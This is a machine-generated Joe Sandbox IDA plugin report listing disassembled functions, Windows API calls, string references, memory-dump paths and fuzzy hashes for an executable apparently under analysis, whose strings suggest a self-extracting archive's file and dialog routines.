Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C

_free.LIBCMT ref: 00195F10
_free.LIBCMT ref: 00195F23
_free.LIBCMT ref: 00195F34
_free.LIBCMT ref: 00195F45

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0abfe1b55b74a4fa46f8a556f7061661be2e703731f55f8a06067ace078e9522
Instruction ID: 0837763d13491cda613e7e2af3a58688ee786aca4ddd3fe008c6f7636152f4bb
Opcode Fuzzy Hash: 0abfe1b55b74a4fa46f8a556f7061661be2e703731f55f8a06067ace078e9522
Instruction Fuzzy Hash: 40F05471A0A1109B8F116F34BC93C153FA5F729721B05050AF841D7B70E73188D1CFA5

Function 00189EED Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 350COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0018A104

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

__EH_prolog3_GS.LIBCMT ref: 0018A452

Strings

.lnk, xrefs: 0018A0FE, 0018A103, 0018A10B
lnk, xrefs: 0018A0C5
0, xrefs: 0018A1C1

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _wcslen$H_prolog3_
String ID: .lnk$0$lnk
API String ID: 2000020936-906397761
Opcode ID: 7ab5f8f6e8b6a02ac934d25b125c6867694d5ff21e359ed36566b267a2d0f9d5
Instruction ID: ae9c8cc3451e4a87acc8838d557d5d76831aaaa8dcb151a6dd9b5b15e5dc512d
Opcode Fuzzy Hash: 7ab5f8f6e8b6a02ac934d25b125c6867694d5ff21e359ed36566b267a2d0f9d5
Instruction Fuzzy Hash: 59E12A71D002589FDB28EBA4CC85BEDB7B8BF19300F5441AAE509B7251DB749B88CF61

Function 00189A86 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00189AC6

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Part of subcall function 0017559C: _wcslen.LIBCMT ref: 001755AC

EndDialog.USER32(?,00000001), ref: 00189E3A

Strings

, xrefs: 00189DE8
@set:user, xrefs: 00189C80

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _wcslen$DialogPathTemp
String ID: $@set:user
API String ID: 2172748170-1503366402
Opcode ID: fa512f38fbaccb2c721fea8fa3ad5e71f5f4b963de22c2049dfb038029d8ef97
Instruction ID: 6bcd9a397c88cbab66a80dd5b0887b8556e5be3debcfda2ab12f45780b1f4ce1
Opcode Fuzzy Hash: fa512f38fbaccb2c721fea8fa3ad5e71f5f4b963de22c2049dfb038029d8ef97
Instruction Fuzzy Hash: ABC14A7180025C9FDF25EBA4CD45BEDBBB8AF25304F44409AE849B7292DB705B89CF61

Function 00188EE2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00175D94: __EH_prolog3.LIBCMT ref: 00175D9B
Part of subcall function 00175D94: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4

Part of subcall function 00176449: __EH_prolog3_GS.LIBCMT ref: 00176450

Part of subcall function 00174CC7: __EH_prolog3_GS.LIBCMT ref: 00174CCE

Part of subcall function 00174A2F: __EH_prolog3_GS.LIBCMT ref: 00174A36
Part of subcall function 00174A2F: SetFileAttributesW.KERNELBASE(?,00000000,00000024,00174830,?,?,?,?,?,?,00000024,001742E9,?,00000001,00000000,?), ref: 00174A4C
Part of subcall function 00174A2F: SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000024), ref: 00174A8F

SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00189097
MoveFileW.KERNEL32(?,?), ref: 0018921E
MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00189238

Part of subcall function 00175F86: __EH_prolog3_GS.LIBCMT ref: 00175F8D

Strings

.tmp, xrefs: 0018918B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
String ID: .tmp
API String ID: 1688541384-2986845003
Opcode ID: 46337631a9cc3c9b16b656994d279176f492983d35e89c37873e79cae1450103
Instruction ID: 02644ff15dd4b23a740b6e3862eae96a9e8025478305448ca5aa0a6d72686ed1
Opcode Fuzzy Hash: 46337631a9cc3c9b16b656994d279176f492983d35e89c37873e79cae1450103
Instruction Fuzzy Hash: E3C1C071C002689ADB25EBA4CC85BEDB7B9BF19300F5481EAE44DA3251DB345B89CF61

Function 00195542 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\w4XFffGDz1.exe,00000104), ref: 00195582
_free.LIBCMT ref: 0019564D
_free.LIBCMT ref: 00195657

Strings

C:\Users\user\Desktop\w4XFffGDz1.exe, xrefs: 00195579, 00195580, 001955AF, 001955E7

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\w4XFffGDz1.exe
API String ID: 2506810119-1933364742
Opcode ID: 31bd189e1999a2dc66f519034e8ce2ca54c276e247a7ddfb948406b8cc8b6b3b
Instruction ID: 4691d2c8fcd5ac90044247158f8a3ef16d75fbf3df59a683552382cc69381262
Opcode Fuzzy Hash: 31bd189e1999a2dc66f519034e8ce2ca54c276e247a7ddfb948406b8cc8b6b3b
Instruction Fuzzy Hash: CF3184B1A05608AFDF22DF99DC81DAEBBFDEF95710F54006AE404E7211D7708A41CB61

Function 00190649 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0019066E
_abort.LIBCMT ref: 00190779

Strings

RCC, xrefs: 00190688
MOC, xrefs: 00190680

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 69de638800fdae5d474363c19d8722d37f4961e941a7aa1a512651bb389ae6c8
Instruction ID: 915b0b667c03175d402dfdba8f78e7944d29888a689349f1343f8a71ac26de8c
Opcode Fuzzy Hash: 69de638800fdae5d474363c19d8722d37f4961e941a7aa1a512651bb389ae6c8
Instruction Fuzzy Hash: 1F415B71900209AFCF16DF98DD81AEEBBB5FF48310F148159FA08A7251D335AA61DF50

Function 00177040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 001770C0
_strncpy.LIBCMT ref: 0017710B

Part of subcall function 0017BBC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00177BB8,?,00000000,00000000,?,?,?,00177BB8,?,?,00000050), ref: 0017BBE5

Strings

@%s, xrefs: 001770AA
$%s, xrefs: 001770B5

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 9ef5a1520a540c9035253747b64fe2f4692d61f86d1c1d2595f6746ecb29542a
Instruction ID: 3fa2d5a5a8deacb6558fe02cdd50a7e3856fb9347a66bf21a4f1ad31db3efc1c
Opcode Fuzzy Hash: 9ef5a1520a540c9035253747b64fe2f4692d61f86d1c1d2595f6746ecb29542a
Instruction Fuzzy Hash: 10218D72A0430DABEB20DEA8CC42EBE77F8BF16310F444515FA18D7291E730EA158B61

Function 0018AF66 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0018AFB4, 0018AFEE
RENAMEDLG, xrefs: 0018AFC7

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 4cebb2ed2b7581b1537ebf2f727d449c4fb3a484ef7109e296625e8b14afecaf
Instruction ID: bece587c4761dffb1a4a4876d540adb1e76d244f8ae9d4371fb7a38d2609ea05
Opcode Fuzzy Hash: 4cebb2ed2b7581b1537ebf2f727d449c4fb3a484ef7109e296625e8b14afecaf
Instruction Fuzzy Hash: 75115EB5204218ABD3229F14EC48E2EBFA5FF49359B84042AF54583A20D331DD95DF62

Function 00191082 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00191033,00000000,?,001CB8E8,?,?,?,001911D6,00000004,InitializeCriticalSectionEx,001A5294,InitializeCriticalSectionEx), ref: 0019108F
GetLastError.KERNEL32(?,00191033,00000000,?,001CB8E8,?,?,?,001911D6,00000004,InitializeCriticalSectionEx,001A5294,InitializeCriticalSectionEx,00000000,?,00190F8D), ref: 00191099
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001910C1

Strings

api-ms-, xrefs: 001910A6

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 24b70cf961da7eef3542c4c8e67c0255e3f8a8cc8163b02c60ed608eeb4e9d9c
Instruction ID: ae174063e8aaf9c2b7fe74628a133981d4f73b983e6fc6f7ee650355d18eca85
Opcode Fuzzy Hash: 24b70cf961da7eef3542c4c8e67c0255e3f8a8cc8163b02c60ed608eeb4e9d9c
Instruction Fuzzy Hash: F3E08634684305B7EF201F60EC06B2D3F99AB12B90F144020FE0CF98E1D772DAD08984

Function 00196F4A Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00196FD5
__alldvrm.LIBCMT ref: 001971D6
__alldvrm.LIBCMT ref: 001971F8

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 8881f98e90fdfbbaba227011bdafa62b0478987616c577047395685bcd86fc10
Instruction ID: 35e74c89ffe23ce006c6d17caa9c3aa8e182a8a62d2e382c0d75a8dcfdd07431
Opcode Fuzzy Hash: 8881f98e90fdfbbaba227011bdafa62b0478987616c577047395685bcd86fc10
Instruction Fuzzy Hash: 57A13772A283869FEF16CF58C8917AEBBE5EF65310F2841BDE4959B2C1D3348941C750

Function 00199D28 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,54E85006,00191DA4,00000000,00000000,00192DD9,?,00192DD9,?,00000001,00191DA4,54E85006,00000001,00192DD9,00192DD9), ref: 00199D75
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00199DFE
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00199E10
__freea.LIBCMT ref: 00199E19

Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4e1e061a04c79b414f2f62ff71bdca09f196dd8b0d3f6ce757363d0d967eb084
Instruction ID: 8e24c90b178feb4b9cc74ab543b230bc84298edc30af529f6672313ec1360948
Opcode Fuzzy Hash: 4e1e061a04c79b414f2f62ff71bdca09f196dd8b0d3f6ce757363d0d967eb084
Instruction Fuzzy Hash: 38319A72A0020AABDF25DFA8DC85DEE7BA5EB11710B05412CFC04D7290EB35DDA0CBA0

Function 00179ADC Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00179AE3
ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00179AFA
ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00179B37
_wcslen.LIBCMT ref: 00179B47

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: EnvironmentExpandStrings$H_prolog3_wcslen
String ID:
API String ID: 3741103063-0
Opcode ID: 4179566e0f1a487dc650eb3f34550dec0b2756e940c7cdade55901b80c6561d6
Instruction ID: 9acb4a360ab66517bd6b8fb2b6172d69adb74869d3ebbd71a4ab54b7c09e45b2
Opcode Fuzzy Hash: 4179566e0f1a487dc650eb3f34550dec0b2756e940c7cdade55901b80c6561d6
Instruction Fuzzy Hash: 7B119A71A0121AAB8B04EFA89D95DBFB779EF55300B208119F415A7240CB30AE49CBB0

Function 00175CF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00175CFE

Part of subcall function 00175032: GetVersionExW.KERNEL32(?), ref: 00175063

FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0018419F,?,?,?), ref: 00175D25
FoldStringW.KERNEL32(00000020,?,000000FF,?,00000008,00000000), ref: 00175D5F
_wcslen.LIBCMT ref: 00175D6A

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FoldString$H_prolog3Version_wcslen
String ID:
API String ID: 535866816-0
Opcode ID: 4414e6b92e0ed26f76712b7004141cb22da0c6db28e6c19fcf04881a780869c9
Instruction ID: a0535cca173bd3e0e66d693191ff34ebc9a63d9a0c1f4d977021327a388eb80c
Opcode Fuzzy Hash: 4414e6b92e0ed26f76712b7004141cb22da0c6db28e6c19fcf04881a780869c9
Instruction Fuzzy Hash: BB117371A11526ABDB10AFA8CD4997F7B7AAF55720F144209B418E72D1CB70A940C7F1

Function 001980D4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue), ref: 00198106
GetLastError.KERNEL32(?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue,001A6870,FlsSetValue,00000000,00000364,?,00196837), ref: 00198112
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue,001A6870,FlsSetValue,00000000), ref: 00198120

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 9459bc16f28d51f062058b39a0c1981a852212a68071187c436f8c77ec04f003
Instruction ID: 57d4909f7fde40e466586355a41545af4657ca9c26c2e5c514ec2e852a5cb75e
Opcode Fuzzy Hash: 9459bc16f28d51f062058b39a0c1981a852212a68071187c436f8c77ec04f003
Instruction Fuzzy Hash: EF01A232615226AFCB254B7CDC44E667B98AF07BA1B260631FA06E7540DB30D842C6E0

Function 00175D94 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00175D9B
GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DD3
_wcslen.LIBCMT ref: 00175DDC

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CurrentDirectory$H_prolog3_wcslen
String ID:
API String ID: 19219720-0
Opcode ID: e64675a5a319f41ae24190fadfbe7cc924a313fb88549cb03ff1bf25a824beab
Instruction ID: e3fe21127b649653dc8f279dfb06843d0c1fe8460efb7d7d32e8918a4e3f3783
Opcode Fuzzy Hash: e64675a5a319f41ae24190fadfbe7cc924a313fb88549cb03ff1bf25a824beab
Instruction Fuzzy Hash: 91018672D00526BB8B10EFB88905ABFBB7AAF95710B154209F515AB241CF749A41CBE1

Function 0018CD5E Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0018CCFB,00000064), ref: 0018CD81
LeaveCriticalSection.KERNEL32(001CB878,?,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CD8B
WaitForSingleObjectEx.KERNEL32(?,00000000,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CD9C
EnterCriticalSection.KERNEL32(001CB878,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CDA3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 358e9e2ecf4ed1fbabab33637256008cf2f9b5adbd9bc466a83bc52072c66591
Instruction ID: 4da538f720b0f3ca8a78838d83228e47db30074cf49d11b482f9ad538c21f7eb
Opcode Fuzzy Hash: 358e9e2ecf4ed1fbabab33637256008cf2f9b5adbd9bc466a83bc52072c66591
Instruction Fuzzy Hash: 69E01231645124FBCB012BA9EC4AE993E6CEB55756F050125FA09F65608771D9A08BD0

Function 00185BFD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00185C00
GetDeviceCaps.GDI32(00000000,00000058), ref: 00185C0F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00185C1D
ReleaseDC.USER32(00000000,00000000), ref: 00185C2B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
